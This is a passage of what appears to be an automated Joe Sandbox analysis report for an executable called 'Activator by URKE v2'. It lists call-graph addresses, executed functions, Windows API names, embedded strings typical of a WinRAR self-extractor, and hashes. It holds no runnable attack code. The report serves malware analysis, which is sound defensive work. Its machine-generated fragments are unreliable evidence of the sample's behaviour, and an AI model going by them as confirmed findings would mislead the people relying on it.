7ff7e5ef4c40 22074->22144 22077 7ff7e5f15c30 _handle_error 8 API calls 22078 7ff7e5f0778f 22077->22078 22085 7ff7e5ef45f0 22078->22085 22079 7ff7e5f09e36 22082 7ff7e5ef4a70 104 API calls 22079->22082 22080 7ff7e5f09e51 22080->22077 22081 7ff7e5ef4c40 101 API calls 22081->22079 22082->22080 22163 7ff7e5ef4d50 22085->22163 22087 7ff7e5ef4628 22092 7ff7e5ef4d50 101 API calls 22087->22092 22088 7ff7e5ef4638 22093 7ff7e5ef4c40 101 API calls 22088->22093 22089 7ff7e5ef4651 22094 7ff7e5f071b4 22089->22094 22091 7ff7e5ef4c40 101 API calls 22091->22087 22092->22088 22093->22089 22095 7ff7e5f071f6 22094->22095 22096 7ff7e5f0728a 22094->22096 22098 7ff7e5f053bc 120 API calls 22095->22098 22107 7ff7e5f072f6 22096->22107 22110 7ff7e5ef4c40 101 API calls 22096->22110 22097 7ff7e5f072cd 22111 7ff7e5ef4d50 101 API calls 22097->22111 22106 7ff7e5f07221 22098->22106 22099 7ff7e5f0502c 120 API calls 22108 7ff7e5f0748e 22099->22108 22100 7ff7e5f072e1 22174 7ff7e5f053bc 22100->22174 22101 7ff7e5f15c30 _handle_error 8 API calls 22105 7ff7e5f0754c 22101->22105 22103 7ff7e5f053bc 120 API calls 22103->22107 22104 7ff7e5f07453 22104->22101 22105->22019 22112 7ff7e5f07f5c 22105->22112 22106->22099 22106->22104 22107->22103 22107->22104 22107->22106 22108->22104 22202 7ff7e5f06fcc 22108->22202 22110->22097 22111->22100 22113 7ff7e5f07f70 22112->22113 22114 7ff7e5f077e7 22112->22114 22113->22114 22265 7ff7e5f04a98 22113->22265 22114->22019 22114->22030 22120 7ff7e5f05054 BuildCatchObjectHelperInternal 22118->22120 22123 7ff7e5f050f8 22118->22123 22119 7ff7e5f053bc 120 API calls 22119->22120 22120->22119 22121 7ff7e5f050de 22120->22121 22120->22123 22344 7ff7e5ef3dc4 99 API calls 22121->22344 22123->22034 22123->22037 22124->22019 22126 7ff7e5ef46dd CreateFileW 22125->22126 22128 7ff7e5ef478e GetLastError 22126->22128 22131 7ff7e5ef484e 22126->22131 22129 7ff7e5ef80b0 49 API calls 22128->22129 22130 7ff7e5ef47bc 22129->22130 22133 7ff7e5ef47c0 CreateFileW GetLastError 22130->22133 22137 7ff7e5ef480c 22130->22137 22132 7ff7e5ef48af 22131->22132 22134 7ff7e5ef4891 SetFileTime 22131->22134 22135 7ff7e5ef48e8 22132->22135 22139 7ff7e5ef1c80 33 API calls 22132->22139 22133->22137 22134->22132 22136 7ff7e5f15c30 _handle_error 8 API calls 22135->22136 22138 7ff7e5ef48fb 22136->22138 22137->22131 22140 7ff7e5ef4916 22137->22140 22138->22071 22143 7ff7e5ef3cd0 100 API calls 2 library calls 22138->22143 22139->22135 22141 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22140->22141 22142 7ff7e5ef491b 22141->22142 22143->22071 22154 7ff7e5ef491c 22144->22154 22147 7ff7e5ef4c67 22149 7ff7e5ef4a70 22147->22149 22150 7ff7e5ef4a96 22149->22150 22151 7ff7e5ef4a9d 22149->22151 22150->22080 22150->22081 22151->22150 22152 7ff7e5ef4520 GetStdHandle ReadFile GetLastError GetLastError GetFileType 22151->22152 22162 7ff7e5ef3d8c 99 API calls _com_raise_error 22151->22162 22152->22151 22155 7ff7e5ef492d _snwprintf 22154->22155 22156 7ff7e5ef4a34 SetFilePointer 22155->22156 22160 7ff7e5ef4959 22155->22160 22159 7ff7e5ef4a5c GetLastError 22156->22159 22156->22160 22157 7ff7e5f15c30 _handle_error 8 API calls 22158 7ff7e5ef49c1 22157->22158 22158->22147 22161 7ff7e5ef3eac 99 API calls _com_raise_error 22158->22161 22159->22160 22160->22157 22164 7ff7e5ef4d6d 22163->22164 22165 7ff7e5ef4d89 22163->22165 22166 7ff7e5ef460f 22164->22166 22172 7ff7e5ef3eac 99 API calls _com_raise_error 22164->22172 22165->22166 22168 7ff7e5ef4da1 SetFilePointer 22165->22168 22166->22091 22168->22166 22169 7ff7e5ef4dbe GetLastError 22168->22169 22169->22166 22170 7ff7e5ef4dc8 22169->22170 22170->22166 22173 7ff7e5ef3eac 99 API calls _com_raise_error 22170->22173 22201 7ff7e5ef4a70 104 API calls 22174->22201 22175 7ff7e5f15c30 _handle_error 8 API calls 22176 7ff7e5f05673 22175->22176 22176->22107 22177 7ff7e5f05408 22178 7ff7e5ef6288 55 API calls 22177->22178 22190 7ff7e5f05621 22177->22190 22179 7ff7e5f05483 22178->22179 22180 7ff7e5f05501 22179->22180 22181 7ff7e5f054ab 22179->22181 22183 7ff7e5f01dd0 64 API calls 22180->22183 22196 7ff7e5f054ff 22180->22196 22181->22196 22209 7ff7e5f01bf4 22181->22209 22183->22196 22184 7ff7e5f04e68 107 API calls 22188 7ff7e5f0553b 22184->22188 22186 7ff7e5f0558f 22186->22190 22193 7ff7e5f0568f 22186->22193 22197 7ff7e5f05694 22186->22197 22188->22186 22191 7ff7e5ef12bc 33 API calls 22188->22191 22190->22175 22195 7ff7e5f0557b 22191->22195 22194 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22193->22194 22194->22197 22256 7ff7e5f00114 83 API calls _handle_error 22195->22256 22196->22184 22199 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22197->22199 22200 7ff7e5f0569a 22199->22200 22201->22177 22261 7ff7e5f07cc8 22202->22261 22205 7ff7e5f0502c 120 API calls 22208 7ff7e5f0703b 22205->22208 22206 7ff7e5f15c30 _handle_error 8 API calls 22207 7ff7e5f07193 22206->22207 22207->22104 22208->22206 22257 7ff7e5ef7af8 47 API calls 22209->22257 22211 7ff7e5f01c2e 22212 7ff7e5ef12bc 33 API calls 22211->22212 22213 7ff7e5f01c5a 22212->22213 22258 7ff7e5f00aa0 CompareStringW 22213->22258 22215 7ff7e5f01c82 22216 7ff7e5ef12bc 33 API calls 22215->22216 22224 7ff7e5f01cdc 22215->22224 22218 7ff7e5f01cb1 22216->22218 22217 7ff7e5f01d7b 22219 7ff7e5ef1b70 31 API calls 22217->22219 22259 7ff7e5f00ad0 CompareStringW 22218->22259 22221 7ff7e5f01d9a 22219->22221 22222 7ff7e5f01dc7 22226 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22222->22226 22223 7ff7e5f01dc2 22228 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22223->22228 22224->22217 22224->22222 22224->22223 22229 7ff7e5f01dcd 22226->22229 22228->22222 22256->22186 22257->22211 22258->22215 22259->22224 22263 7ff7e5f07d1d BuildCatchObjectHelperInternal 22261->22263 22262 7ff7e5f0700f 22262->22205 22262->22208 22263->22262 22264 7ff7e5ef4c40 101 API calls 22263->22264 22264->22263 22266 7ff7e5f04ad2 22265->22266 22279 7ff7e5f04acb 22265->22279 22267 7ff7e5f04b58 22266->22267 22274 7ff7e5f04adf 22266->22274 22276 7ff7e5f04b10 22266->22276 22292 7ff7e5f04710 22267->22292 22268 7ff7e5f15c30 _handle_error 8 API calls 22269 7ff7e5f04d55 22268->22269 22269->22114 22291 7ff7e5ef3834 82 API calls 2 library calls 22269->22291 22270 7ff7e5f0524c 103 API calls 22270->22279 22272 7ff7e5f04b99 22273 7ff7e5f0502c 120 API calls 22272->22273 22284 7ff7e5f04bb0 22273->22284 22275 7ff7e5f04b34 22274->22275 22274->22276 22274->22279 22278 7ff7e5f0502c 120 API calls 22275->22278 22276->22270 22277 7ff7e5f04bb4 22277->22279 22280 7ff7e5f04d6d 22277->22280 22278->22279 22279->22268 22282 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22280->22282 22281 7ff7e5f04c44 22323 7ff7e5f0a1a0 34 API calls 22281->22323 22285 7ff7e5f04d72 22282->22285 22284->22277 22284->22281 22286 7ff7e5f04c56 22284->22286 22299 7ff7e5efcd00 22286->22299 22291->22114 22293 7ff7e5f047e9 22292->22293 22296 7ff7e5f04745 22292->22296 22324 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 22293->22324 22297 7ff7e5f04753 memcpy_s 22296->22297 22298 7ff7e5f15ae0 4 API calls 22296->22298 22297->22272 22298->22297 22300 7ff7e5efcd2a 22299->22300 22302 7ff7e5efcd34 22299->22302 22339 7ff7e5f00474 33 API calls 22300->22339 22314 7ff7e5efcd85 22302->22314 22325 7ff7e5efc93c 22302->22325 22304 7ff7e5efc93c 33 API calls 22307 7ff7e5efcdef 22304->22307 22340 7ff7e5f00268 34 API calls _invalid_parameter_noinfo_noreturn 22307->22340 22314->22304 22322 7ff7e5efce8e 22314->22322 22315 7ff7e5efcd2f 22341 7ff7e5efd5f0 47 API calls 22315->22341 22318 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22322->22318 22326 7ff7e5efca14 22325->22326 22327 7ff7e5efc971 22325->22327 22342 7ff7e5ef1bd4 33 API calls std::_Xinvalid_argument 22326->22342 22330 7ff7e5f15ae0 4 API calls 22327->22330 22331 7ff7e5efc97f BuildCatchObjectHelperInternal 22327->22331 22330->22331 22339->22315 22344->22123 22346 7ff7e5ef6592 FindNextFileW 22345->22346 22347 7ff7e5ef64b9 FindFirstFileW 22345->22347 22349 7ff7e5ef65b3 22346->22349 22350 7ff7e5ef65a1 GetLastError 22346->22350 22347->22349 22351 7ff7e5ef64de 22347->22351 22352 7ff7e5ef65d1 22349->22352 22356 7ff7e5ef1c80 33 API calls 22349->22356 22365 7ff7e5ef6580 22350->22365 22353 7ff7e5ef80b0 49 API calls 22351->22353 22358 7ff7e5ef12bc 33 API calls 22352->22358 22355 7ff7e5ef6504 22353->22355 22354 7ff7e5f15c30 _handle_error 8 API calls 22357 7ff7e5ef62b4 22354->22357 22359 7ff7e5ef6527 22355->22359 22360 7ff7e5ef6508 FindFirstFileW 22355->22360 22356->22352 22357->22054 22357->22057 22361 7ff7e5ef65fb 22358->22361 22359->22349 22363 7ff7e5ef656f GetLastError 22359->22363 22370 7ff7e5ef66d4 22359->22370 22360->22359 22371 7ff7e5ef8dc4 22361->22371 22363->22365 22365->22354 22366 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22367 7ff7e5ef66da 22366->22367 22368 7ff7e5ef66cf 22369 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 22368->22369 22369->22370 22370->22366 22372 7ff7e5ef8dd9 22371->22372 22375 7ff7e5ef8f28 22372->22375 22374 7ff7e5ef6609 22374->22365 22374->22368 22376 7ff7e5ef90c6 22375->22376 22379 7ff7e5ef8f5a 22375->22379 22383 7ff7e5ef353c 47 API calls 22376->22383 22381 7ff7e5ef8f74 BuildCatchObjectHelperInternal 22379->22381 22382 7ff7e5ef6edc 33 API calls 2 library calls 22379->22382 22381->22374 22382->22381 22385 7ff7e5f0c15c 4 API calls 22384->22385 22386 7ff7e5f0c13a 22385->22386 22387 7ff7e5f0c149 22386->22387 22396 7ff7e5f0c194 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22386->22396 22387->21365 22387->21366 22389->21373 22390->21377 22392 7ff7e5f0c173 22391->22392 22393 7ff7e5f0c16e 22391->22393 22392->21377 22397 7ff7e5f0c1cc GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22393->22397 22395->21380 22396->22387 22397->22392 22400->21432 22402->21456 22403->21463 22405->21468 22407->21474 22473 7ff7e5f14976 14 API calls _com_raise_error 23053 7ff7e5f15a00 23054 7ff7e5f15a16 _com_error::_com_error 23053->23054 23059 7ff7e5f17848 23054->23059 23056 7ff7e5f15a27 23057 7ff7e5f15390 _com_raise_error 14 API calls 23056->23057 23058 7ff7e5f15a73 23057->23058 23060 7ff7e5f17867 23059->23060 23061 7ff7e5f17884 RtlPcToFileHeader 23059->23061 23060->23061 23062 7ff7e5f178ab RaiseException 23061->23062 23063 7ff7e5f1789c 23061->23063 23062->23056 23063->23062 23069 7ff7e5f1f40c 23076 7ff7e5f20470 23069->23076 23081 7ff7e5f20950 35 API calls 3 library calls 23076->23081 23078 7ff7e5f2047b 23082 7ff7e5f20570 35 API calls abort 23078->23082 23081->23078 23261 7ff7e5f00120 23262 7ff7e5f13c98 23261->23262 23263 7ff7e5f13cd7 23262->23263 23264 7ff7e5f13d4f 23262->23264 23266 7ff7e5efaee0 48 API calls 23263->23266 23265 7ff7e5efaee0 48 API calls 23264->23265 23267 7ff7e5f13d63 23265->23267 23268 7ff7e5f13ceb 23266->23268 23288 7ff7e5efda04 48 API calls 23267->23288 23287 7ff7e5efda04 48 API calls 23268->23287 23271 7ff7e5ef1b70 31 API calls 23272 7ff7e5f13df9 23271->23272 23273 7ff7e5ef210c SetDlgItemTextW 23272->23273 23278 7ff7e5f13e0e SetWindowTextW 23273->23278 23274 7ff7e5f13e84 23277 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 23274->23277 23275 7ff7e5f13cfa BuildCatchObjectHelperInternal 23275->23271 23275->23274 23276 7ff7e5f13e7e 23275->23276 23279 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 23276->23279 23280 7ff7e5f13e8a 23277->23280 23281 7ff7e5f13e27 23278->23281 23282 7ff7e5f13e54 23278->23282 23279->23274 23281->23282 23284 7ff7e5f13e79 23281->23284 23283 7ff7e5f15c30 _handle_error 8 API calls 23282->23283 23285 7ff7e5f13e67 23283->23285 23286 7ff7e5f1ae94 _invalid_parameter_noinfo_noreturn 31 API calls 23284->23286 23286->23276 23287->23275 23288->23275

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 00007FF7E5EFDC4C Relevance: 154.6, APIs: 22, Strings: 66, Instructions: 610libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 0 7ff7e5efdc4c-7ff7e5efdcb0 call 7ff7e5ef13c4 GetSystemDirectoryW 3 7ff7e5efdcb2-7ff7e5efdcb4 0->3 4 7ff7e5efdcb9-7ff7e5efdd34 call 7ff7e5f1af0c call 7ff7e5ef12bc call 7ff7e5f1af0c call 7ff7e5ef12bc call 7ff7e5ef88f8 0->4 5 7ff7e5efde19-7ff7e5efde20 3->5 31 7ff7e5efdd36-7ff7e5efdd48 4->31 32 7ff7e5efdd68-7ff7e5efdd81 4->32 7 7ff7e5efde22-7ff7e5efde35 5->7 8 7ff7e5efde51-7ff7e5efde78 call 7ff7e5f15c30 5->8 10 7ff7e5efde4c call 7ff7e5f15b1c 7->10 11 7ff7e5efde37-7ff7e5efde4a 7->11 10->8 11->10 14 7ff7e5efde79-7ff7e5efde7e call 7ff7e5f1ae94 11->14 23 7ff7e5efde7f-7ff7e5efde84 call 7ff7e5f1ae94 14->23 28 7ff7e5efde85-7ff7e5efde8a call 7ff7e5f1ae94 23->28 38 7ff7e5efde8b-7ff7e5efdee8 call 7ff7e5f1ae94 call 7ff7e5f15c90 GetModuleHandleW 28->38 34 7ff7e5efdd63 call 7ff7e5f15b1c 31->34 35 7ff7e5efdd4a-7ff7e5efdd5d 31->35 36 7ff7e5efddb5-7ff7e5efddd4 LoadLibraryExW 32->36 37 7ff7e5efdd83-7ff7e5efdd95 32->37 34->32 35->23 35->34 42 7ff7e5efddd6-7ff7e5efdde8 36->42 43 7ff7e5efde08-7ff7e5efde15 36->43 40 7ff7e5efddb0 call 7ff7e5f15b1c 37->40 41 7ff7e5efdd97-7ff7e5efddaa 37->41 53 7ff7e5efdf3f-7ff7e5efe269 38->53 54 7ff7e5efdeea-7ff7e5efdefd GetProcAddress 38->54 40->36 41->28 41->40 46 7ff7e5efde03 call 7ff7e5f15b1c 42->46 47 7ff7e5efddea-7ff7e5efddfd 42->47 43->5 46->43 47->38 47->46 55 7ff7e5efe26f-7ff7e5efe278 call 7ff7e5f1ec3c 53->55 56 7ff7e5efe3c7-7ff7e5efe3e5 call 7ff7e5ef7c10 call 7ff7e5ef8b28 53->56 57 7ff7e5efdeff-7ff7e5efdf0e 54->57 58 7ff7e5efdf17-7ff7e5efdf2a GetProcAddress 54->58 55->56 65 7ff7e5efe27e-7ff7e5efe2c1 call 7ff7e5ef7c10 CreateFileW 55->65 69 7ff7e5efe3e9-7ff7e5efe3f3 call 7ff7e5ef6768 56->69 57->58 58->53 61 7ff7e5efdf2c-7ff7e5efdf3c 58->61 61->53 72 7ff7e5efe3b4-7ff7e5efe3c2 CloseHandle call 7ff7e5ef1b70 65->72 73 7ff7e5efe2c7-7ff7e5efe2da SetFilePointer 65->73 77 7ff7e5efe3f5-7ff7e5efe400 call 7ff7e5efdc4c 69->77 78 7ff7e5efe428-7ff7e5efe470 call 7ff7e5f1af0c call 7ff7e5ef12bc call 7ff7e5ef8dc4 call 7ff7e5ef1b70 call 7ff7e5ef5890 69->78 72->56 73->72 75 7ff7e5efe2e0-7ff7e5efe302 ReadFile 73->75 75->72 79 7ff7e5efe308-7ff7e5efe316 75->79 77->78 89 7ff7e5efe402-7ff7e5efe426 CompareStringW 77->89 123 7ff7e5efe475-7ff7e5efe478 78->123 82 7ff7e5efe6c4-7ff7e5efe6dc call 7ff7e5f15df4 call 7ff7e5f00100 call 7ff7e5f00108 79->82 83 7ff7e5efe31c-7ff7e5efe370 call 7ff7e5f1af0c call 7ff7e5ef12bc 79->83 118 7ff7e5efe6ef-7ff7e5efe6f6 82->118 119 7ff7e5efe6de-7ff7e5efe6ea call 7ff7e5ef3b84 82->119 100 7ff7e5efe387-7ff7e5efe39d call 7ff7e5efcf98 83->100 89->78 93 7ff7e5efe481-7ff7e5efe48a 89->93 93->69 97 7ff7e5efe490 93->97 102 7ff7e5efe495-7ff7e5efe498 97->102 116 7ff7e5efe372-7ff7e5efe382 call 7ff7e5efdc4c 100->116 117 7ff7e5efe39f-7ff7e5efe3af call 7ff7e5ef1b70 * 2 100->117 106 7ff7e5efe503-7ff7e5efe506 102->106 107 7ff7e5efe49a-7ff7e5efe49d 102->107 111 7ff7e5efe686-7ff7e5efe6c3 call 7ff7e5ef1b70 * 2 call 7ff7e5f15c30 106->111 112 7ff7e5efe50c-7ff7e5efe51f call 7ff7e5ef8be4 call 7ff7e5ef6768 106->112 113 7ff7e5efe4a1-7ff7e5efe4f1 call 7ff7e5f1af0c call 7ff7e5ef12bc call 7ff7e5ef8dc4 call 7ff7e5ef1b70 call 7ff7e5ef5890 107->113 143 7ff7e5efe525-7ff7e5efe5c5 call 7ff7e5efdc4c * 2 call 7ff7e5efaee0 call 7ff7e5efda04 call 7ff7e5efaee0 call 7ff7e5efdb98 call 7ff7e5f0c3e8 call 7ff7e5ef19d0 112->143 144 7ff7e5efe5ca-7ff7e5efe617 call 7ff7e5efda04 AllocConsole 112->144 168 7ff7e5efe4f3-7ff7e5efe4fc 113->168 169 7ff7e5efe500 113->169 116->100 117->72 129 7ff7e5efe709-7ff7e5efe712 SetThreadExecutionState 118->129 130 7ff7e5efe6f8-7ff7e5efe704 call 7ff7e5ef3b84 118->130 119->118 132 7ff7e5efe492 123->132 133 7ff7e5efe47a 123->133 130->129 132->102 133->93 161 7ff7e5efe678-7ff7e5efe67f call 7ff7e5ef19d0 ExitProcess 143->161 154 7ff7e5efe674 144->154 155 7ff7e5efe619-7ff7e5efe66e GetCurrentProcessId AttachConsole call 7ff7e5efe72c call 7ff7e5efe71c GetStdHandle WriteConsoleW Sleep FreeConsole 144->155 154->161 155->154 168->113 173 7ff7e5efe4fe 168->173 169->106 173->106
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$AddressProc$DirectoryHandleLibraryLoadModuleSystem
                                                                                                                                                                                                                                                  • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                                                                                                                                                                  • API String ID: 751436351-2013832382
                                                                                                                                                                                                                                                  • Opcode ID: 407a4525f70a022c2e68e871a7c89ca27ad472116fea8786bc8f1f6d443cd91b
                                                                                                                                                                                                                                                  • Instruction ID: 73f321bdf33df86738ea5fa9f2293aacc35d219232412407edcd2d4c36e414ef
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 407a4525f70a022c2e68e871a7c89ca27ad472116fea8786bc8f1f6d443cd91b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53627075A09B8A95EB11AF60E9602E9B364FF44B54FC00237DA8C877A5EF3CE154C361
                                                                                                                                                                                                                                                  Function 00007FF7E5F0ECE0 Relevance: 125.7, APIs: 61, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWait
                                                                                                                                                                                                                                                  • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                                                                                                                                                                                  • API String ID: 2514108016-2702805183
                                                                                                                                                                                                                                                  • Opcode ID: 90f0c2a0039a61cf03d93d6d4365e523954047bb944b651ca9b0316068dc13b4
                                                                                                                                                                                                                                                  • Instruction ID: 8caab0c6b31d2086aba02fe3349895c3d28adf1eff394027aa17a974154b8d93
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90f0c2a0039a61cf03d93d6d4365e523954047bb944b651ca9b0316068dc13b4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9D2A661A1878A81EA20FB25D8743FAA351EF85F84FC44133D98DC76A6DE3CE554C722
                                                                                                                                                                                                                                                  Function 00007FF7E5F109D8 Relevance: 66.7, APIs: 27, Strings: 10, Instructions: 1963windowfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFile$MessageMoveSend$DialogItemOperationPathTemp
                                                                                                                                                                                                                                                  • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                                                                                                                                                                                  • API String ID: 2933078328-3916287355
                                                                                                                                                                                                                                                  • Opcode ID: 98bb8c26fd065e7a09049068dcd443c1bd57cd059804933086baa0f4b4fd0c8d
                                                                                                                                                                                                                                                  • Instruction ID: 46d1c20f58d33ab629dacf8f908371f76e9d601b2c77942c137be8eecd81cce1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98bb8c26fd065e7a09049068dcd443c1bd57cd059804933086baa0f4b4fd0c8d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F13C262B0478A85EB10EF64D9603EC67B1EB40B98FC00137DA5D97ADADF38E594C361
                                                                                                                                                                                                                                                  Function 00007FF7E5F1400C Relevance: 47.8, APIs: 22, Strings: 5, Instructions: 539filetimewindowCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1523 7ff7e5f1400c-7ff7e5f140e1 call 7ff7e5efde94 call 7ff7e5ef7a28 call 7ff7e5f0d0a8 call 7ff7e5f174c0 call 7ff7e5f0d724 1534 7ff7e5f14118-7ff7e5f1413b 1523->1534 1535 7ff7e5f140e3-7ff7e5f140f8 1523->1535 1538 7ff7e5f1413d-7ff7e5f14152 1534->1538 1539 7ff7e5f14172-7ff7e5f14195 1534->1539 1536 7ff7e5f140fa-7ff7e5f1410d 1535->1536 1537 7ff7e5f14113 call 7ff7e5f15b1c 1535->1537 1536->1537 1542 7ff7e5f14695-7ff7e5f1469a call 7ff7e5f1ae94 1536->1542 1537->1534 1544 7ff7e5f1416d call 7ff7e5f15b1c 1538->1544 1545 7ff7e5f14154-7ff7e5f14167 1538->1545 1540 7ff7e5f14197-7ff7e5f141ac 1539->1540 1541 7ff7e5f141cc-7ff7e5f141ef 1539->1541 1546 7ff7e5f141c7 call 7ff7e5f15b1c 1540->1546 1547 7ff7e5f141ae-7ff7e5f141c1 1540->1547 1548 7ff7e5f141f1-7ff7e5f14206 1541->1548 1549 7ff7e5f14226-7ff7e5f14232 GetCommandLineW 1541->1549 1560 7ff7e5f1469b-7ff7e5f146c7 call 7ff7e5f1ae94 1542->1560 1544->1539 1545->1542 1545->1544 1546->1541 1547->1542 1547->1546 1553 7ff7e5f14208-7ff7e5f1421b 1548->1553 1554 7ff7e5f14221 call 7ff7e5f15b1c 1548->1554 1556 